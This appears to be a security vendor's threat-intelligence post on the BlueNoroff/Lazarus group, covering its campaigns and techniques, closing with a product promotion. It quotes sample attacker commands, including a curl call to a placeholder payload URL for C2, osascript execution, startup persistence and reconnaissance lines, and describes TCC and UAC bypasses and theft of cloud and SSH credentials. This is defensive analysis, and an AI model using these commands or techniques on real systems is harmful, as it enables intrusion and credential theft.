BlueNoroff, a sub-group of the Lazarus collective dedicated to financial theft, has established a notorious reputation for high-stakes cybercrime, most notably the 2016 Bangladesh Central Bank heist, where they compromised SWIFT infrastructure to steal $81 million. Following this, they launched watering hole attacks against Polish banks before pivoting in 2017 to target cryptocurrency businesses via the SnatchCrypto campaign. Their operations evolved in 2018 to include fake software companies distributing backdoored applications, while recent years saw a focus on macOS targets in the Web3 sector through the 2023 GhostCall and GhostHire campaigns involving fake job interviews. Activity persisted into 2025 with supply chain attacks using malicious Go packages and a tactical shift to Microsoft Teams impersonation for distributing malware.
The group employs a diverse set of tactics that begins with deep reconnaissance on platforms like LinkedIn to create credible personas for spearphishing via Telegram or malicious job assessment links. They utilize a robust infrastructure of lookalike domains and modular malware developed in languages such as Rust and Go, often executing payloads via AppleScript, VBScript, or social engineering techniques like ClickFix. Persistence is achieved through methods ranging from tampering with browser extensions to creating macOS Launch Agents. Their objective is consistently supported by aggressive credential access through fake GUI prompts and extensive system discovery to facilitate large-scale financial theft.
In this post, we will examine the major historical activities of Lazarus / BlueNoroff, highlighting their evolution from banking heists to cryptocurrency targeting, and analyze the group's tactics, techniques, and procedures to understand their sophisticated financial cybercrime operations. In the end, we will show how Picus helps defend against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
The actor leveraged compromised accounts of legitimate entrepreneurs and startup founders to initiate contact with targets, implying they first gathered the necessary credentials to access these accounts.
BlueNoroff sourced profile images from social media and professional networking sites such as LinkedIn, Crunchbase, and X. These images were used to construct deceptive personas that mimicked real professionals.
BlueNoroff registered domains that closely resembled legitimate ones, such as support.video-meeting[.]online and swissborg[.]blog, to host malicious content and Command and Control (C2) infrastructure.
The threat actor employed hosting services, specifically Hostwinds, to establish and maintain phishing websites designed to mimic legitimate services.
The group actively developed a modular malware framework consisting of launchers, injectors, installers, and loaders. They utilized multiple programming languages, including Rust, C++, Python, Go, Swift, and Nim, to create these tools. Additionally, they created malicious packages for Go and TypeScript projects to be used in supply chain-style attacks.
The actor utilized legitimate tools such as "Calendly" to schedule fraudulent meetings.
In the "GhostCall" campaign, the actor invited victims to fake video calls on phishing sites mimicking Zoom or Microsoft Teams. These sites requested permissions to access the camera and microphone to record the victim.
BlueNoroff sent malicious links to targets via Telegram or LinkedIn. These links directed victims to fake meeting sites mimicking Zoom or to download malicious archives disguised as job assessments.
The group targeted individuals through messaging platforms. They impersonated venture capitalists on Telegram to establish trust before sending malicious payloads. Also, they used Telegram bots to deliver malicious ZIP files or GitHub links under the pretense of a technical skill assessment.
On macOS, AppleScript was a primary execution method. Scripts disguised as software updates (e.g., Zoom SDK Update.scpt) and the osascript command, which is used to execute AppleScript, were utilized to download and run payloads [3]. An example usage of osascript is given below:
|
osascript /example/path/to/Malicious_File.scpt |
On Windows, a VBScript wrapper (init.vbs) was generated to execute PowerShell scripts covertly.
JavaScript was employed on phishing pages to handle user interactions, such as requesting camera permissions, managing the recording and uploading of video feeds to the /upload endpoint. For instance, camera permission can be requested with navigator.mediaDevices.getUserMedia() API.
A "ClickFix" technique involved placing a malicious command shell command into the clipboard for the user to execute the malicious actions [3]:
|
cmd "<TRUNCATED COMMANDS>" |
BlueNoroff targets cryptocurrency wallets by replacing the core component (background.js) of the Metamask extension with a tampered version to monitor transactions.
|
// Malicious injection in Metamask background.js |
On macOS, BlueNoroff created Launch Agents (e.g., com.applet.safari.plist) in ~/Library/LaunchAgents/ to ensure malware execution at login. Keys like RunAtLoad and KeepAlive were set to true [3].
Launch Daemons were created on macOS (e.g., com.apple.updatecheck). These were loaded using launchctl commands.
|
launchctl unload <plist file> |
Persistence is achieved by placing VBS scripts or shortcuts in the Windows Startup folder.
|
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\check.vbs |
The threat actor employs various injection techniques across different malware variants. On Windows, the "peshooter" function within the RooTroy and CosmicDoor malware injects payloads into legitimate processes like notepad.exe. On macOS, the GillyInjector utilizes task injection to inject malicious payloads into other processes [3].
On macOS, a downloader script used by BlueNoroff actively bypasses Transparency, Consent, and Control (TCC) protections. It renames the user's com.apple.TCC directory and directly modifies the TCC.db database using INSERT OR REPLACE statements. This allows the malware to grant itself unauthorized permissions, such as access to Documents, Downloads, Desktop folders, and AppleEvents, without user consent [3].
To gain elevated privileges on Windows, the actor utilizes a UAC bypass tool leveraging an RPC-based method. This technique leverages the 201ef99a-7fa0-444c-9399-19ba84f12a1a interface. This allows the actor to execute the initial DownTroy script and subsequent payloads with high privileges [3].
The "Bof loader" was protected using "Themida," a commercial packer, to complicate analysis.
Scripts and payloads were obfuscated to hide their contents. For example, PowerShell scripts used XOR encryption and AppleScript files included thousands of blank lines to conceal malicious code. Additionally, Base64 encoding and RC4/AES encryption were used for payloads and configurations.
Malware components disguised themselves as legitimate files. For example, binaries used names like trustd, watchdog, or Google LLC, and fake applications mimicked "Zoom" or "Microsoft Teams" with identical icons. Also, malicious plists mimicked Safari components.
"RooTroy" and "Bof Loader" unhooked ntdll.dll on Windows to bypass API hooking used by security products.
On macOS, the ZoomClutch and TeamsClutch malware display fake password prompt windows that mimic legitimate system authentication dialogs. These prompts trick victims into entering their passwords, which are then validated against the local Open Directory. Once validated, these credentials are used to execute commands with root privileges, facilitating the installation of root-level persistence mechanisms.
A script, which is named secrets.sh and found in the SilentSiphon suite, searched for and stole files containing credentials, such as configuration files for AWS, Google Cloud, and Azure (.aws, .config/gcloud), as well as SSH keys and package manager configs.
The threat actor executed commands to gather network configuration data.
|
ipconfig /all>[Output File] 2>&1 |
BlueNoroff utilized the ping command to discover remote systems.
|
ping -n 1 [Redacted IP] > [Output File] 2>&1 |
A trojan used by BlueNoroff collects system information like computer name, OS version, time zone, processes, and prepares it for transmission to the C&C server every minute.
Attackers enumerate local users and administrator groups.
|
cmd.exe /c "net user [Username] /domain >[Output File] 2>&1" |
The threat actor searches for and collects specific files, such as cryptocurrency configuration files or policy documents [2].
|
cmd.exe /c "type D:\2\Crypt[redacted]\Crypt[redacted].conf >[Output File] 2>&1" |
The attackers create specific directories to stage data before exfiltration.
|
cmd.exe /c "mkdir %public%\MM >%temp%\TMPF522.tmp 2>&1" |
The malware utilized the cURL library to communicate with C2 servers via HTTP/HTTPS [5].
|
curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da |
BlueNoroff is financially motivated and has been observed stealing cryptocurrency worth millions, utilizing their cyberattack capabilities for profit.
We also strongly suggest simulating BlueNoroff Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the BlueNoroff Group:
|
Threat ID |
Threat Name |
Attack Module |
|
54002 |
BlueNoroff Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
68160 |
BlueNoroff Threat Group Campaign Malware Email Threat |
E-mail Infiltration |
|
47104 |
GhostHire Campaign Malware Download Threat |
Network Infiltration |
|
35520 |
GhostHire Campaign Malware Email Threat |
E-mail Infiltration |
|
81005 |
GillyInjector Malware Dropper Download Threat |
Network Infiltration |
|
73326 |
GillyInjector Malware Dropper Email Threat |
E-mail Infiltration |
|
22312 |
APT38 Threat Group Campaign Malware Dropper Download Threat |
Network Infiltration |
|
98859 |
APT38 Threat Group Campaign Malware Dropper Email Threat |
E-mail Infiltration |
|
98288 |
BlueNoroff Threat Group Campaign |
macOS Endpoint |
|
89564 |
NukeSped Malware Campaign |
macOS Endpoint |
|
73913 |
NukeSped Backdoor Malware Download Threat |
Network Infiltration |
|
45307 |
NukeSped Backdoor Malware Email Threat |
E-mail Infiltration |
|
72931 |
APT38 Threat Group FASTCash 2.0 Campaign |
Windows Endpoint |
|
68591 |
RustBucket Trojan Download Threat |
Network Infiltration |
|
55476 |
RustBucket Trojan Email Threat |
E-mail Infiltration |
|
92626 |
ObjCShellz Web Shell Email Threat |
E-mail Infiltration |
|
91835 |
ObjCShellz Web Shell Download Threat |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] GReAT, “Lazarus Under The Hood,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/lazarus-under-the-hood/77908/
[2] S. Park, “The BlueNoroff cryptocurrency hunt is still on,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/
[3] S. Ryu, “Crypto wasted: BlueNoroff’s ghost mirage of funding and jobs,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/
[4] S. Puzan, “BlueNoroff: new Trojan attacking macOS users,” Kaspersky. Accessed: Jan. 14, 2026. [Online]. Available: https://securelist.com/bluenoroff-new-macos-malware/111290/
[5] S. Park, “BlueNoroff introduces new methods bypassing MoTW,” Kaspersky. Accessed: Jan. 19, 2026. [Online]. Available: https://securelist.com/bluenoroff-methods-bypass-motw/108383/